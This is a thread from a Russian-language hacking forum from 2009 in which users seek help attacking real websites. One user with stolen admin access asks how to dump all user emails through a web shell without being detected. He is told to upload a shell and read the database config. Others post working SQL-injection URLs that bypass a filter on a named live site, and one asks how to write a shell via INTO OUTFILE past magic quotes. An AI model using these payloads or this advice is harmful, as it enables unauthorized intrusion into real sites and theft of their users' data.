HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1065 из 2422 « Первая < 6556596510151055 1061 1062 1063 1064 1065 1066 1067 1068 1069 10751115116515652065 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.12.2009, 13:53
SnooPy
Новичок
Регистрация: 16.12.2009
Сообщений: 18
Провел на форуме:
92411

Репутация: 3
По умолчанию
Здавствуйте помогите пожалуйста со скулой есть сайт выводит вот такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 5'
я так понял тут нужно Limit использовать?
Последний раз редактировалось SnooPy; 19.12.2009 в 14:03..
 
Ответить с цитированием

  #2  
Старый 19.12.2009, 15:21
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию
имею доступ в админку (root). Нужно слить оттуда всю бд юзеров и их мыльники. В админке, кроме как редактирования различных разделов,добавлений нвостей, опросов, ничего нет, типа dump database и т.д. Шелл? Но как чтобы не спалится?
П.С. С шеллами дел почти не имел, поэтому, если этот метод в моем случае прокатит, то расскажите поподробнее)
 
Ответить с цитированием

  #3  
Старый 19.12.2009, 15:33
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию
Цитата:
Сообщение от jecka3000  
имею доступ в админку (root). Нужно слить оттуда всю бд юзеров и их мыльники. В админке, кроме как редактирования различных разделов,добавлений нвостей, опросов, ничего нет, типа dump database и т.д. Шелл? Но как чтобы не спалится?
П.С. С шеллами дел почти не имел, поэтому, если этот метод в моем случае прокатит, то расскажите поподробнее)
лей шелл через админку (если это возможно), смотри конфиг подключения к бд, с шелла подключаешься к бд, сливаешь что тебе нужно.
 
Ответить с цитированием

  #4  
Старый 19.12.2009, 15:42
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию
Цитата:
лей шелл через админку (если это возможно), смотри конфиг подключения к бд, с шелла подключаешься к бд, сливаешь что тебе нужно.
как узнать возможно залить шелл или нет? В админке можно редактировать новости, а также есть система баннерной рекламы, где нужна ссылка на баннер, сам баннер, с моего компа( может быть именну тут и попробовать залить?) также можно выбрать с какого числа по которое показывать.
Да, и как не спалится, если я сейчас через баннер залью шелл и как мне потом к шеллу коннектиться?))
 
Ответить с цитированием

  #5  
Старый 19.12.2009, 16:31
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Цитата:
Сообщение от jecka3000  
как узнать возможно залить шелл или нет? В админке можно редактировать новости, а также есть система баннерной рекламы, где нужна ссылка на баннер, сам баннер, с моего компа( может быть именну тут и попробовать залить?) также можно выбрать с какого числа по которое показывать.
Да, и как не спалится, если я сейчас через баннер залью шелл и как мне потом к шеллу коннектиться?))
Методом научного тыка.
 
Ответить с цитированием

  #6  
Старый 19.12.2009, 17:44
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
http://www.sendas.org.ec/contenido.php?idM=[SQL]

Ещё один фильтр SQL иньекций с новым подходом.
Режет union и select при условии, что те упоминаются вместе и последовательно.
То есть так:
Код:
http://www.sendas.org.ec/contenido.php?idM=-1+union+select+1--&idP=0&lan=1
Ошибка 403.

А вот так:
Код:
http://www.sendas.org.ec/contenido.php?idM=-1+select+union+1--&idP=0&lan=1
Работает.

Как обойти?
Последний раз редактировалось Nightmarе; 19.12.2009 в 17:46..
 
Ответить с цитированием

  #7  
Старый 19.12.2009, 17:47
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию
ну например так:
http://www.sendas.org.ec/contenido.php?idM=-1+union(select+1)--&idP=0&lan=1
added
http://www.sendas.org.ec
/contenido.php?idM=-1+union(select+1,2,3,4,5,6,7,8,9,version%28%29,1,2 )--&idP=0&lan=1
Последний раз редактировалось geezer.code; 19.12.2009 в 17:49..
 
Ответить с цитированием

  #8  
Старый 19.12.2009, 17:53
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию
Цитата:
Сообщение от geezer.code  
ну например так:
http://www.sendas.org.ec/contenido.php?idM=-1+union(select+1)--&idP=0&lan=1
added
http://www.sendas.org.ec
/contenido.php?idM=-1+union(select+1,2,3,4,5,6,7,8,9,version%28%29,1,2 )--&idP=0&lan=1

Код:
http://www.sendas.org.ec/contenido.php?idM=%28-1%29union%28select%281%29,%282%29,%283%29,%284%29,%285%29,%286%29,%287%29,%288%29,%289%29,%28version%28%29%29,%281%29,%282%29%20%29--&idP=0&lan=1
без мочилова мозга мон и так
Код:
http://www.sendas.org.ec/contenido.php?idM=-1+union+all+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12&idP=0&lan=1
Последний раз редактировалось [x60]unu; 19.12.2009 в 17:56..
 
Ответить с цитированием

  #9  
Старый 19.12.2009, 17:58
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
Спасибо всем. Пашет на ура!
 
Ответить с цитированием

  #10  
Старый 19.12.2009, 21:47
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
Очередной вопрос по безопасности.
Товарищем Scipio был опубликован способ обхода Magic Quotes при заливке шелла через into outfile
Вот собственно сам способ
Так вот. У меня та-же ситуация щас, есть рутовый MySQL + Иньект с Magic Quotes
Полей тоже 3. Выводится инфа на экран только во 2 поле.
Вот в неё я и подставляю захексованый второй запрос:
Код:
id=-99999+union+select+1,0x2D3120756E696F6E2073656C65637420276D616769635F716F74657320697320737578272F2A,3/*
Но он выполняется как обычный текст, выводит просто:
-1 union select 'magic_qotes is sux'/*
В виде текста и всё....
Пробовал конечно /* менять на -- и т.д... но больше никак допереть не могу... Надеюсь что всё-таки что то можно сделать.
 
Ответить с цитированием
Ответ
Страница 1065 из 2422 « Первая < 6556596510151055 1061 1062 1063 1064 1065 1066 1067 1068 1069 10751115116515652065 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ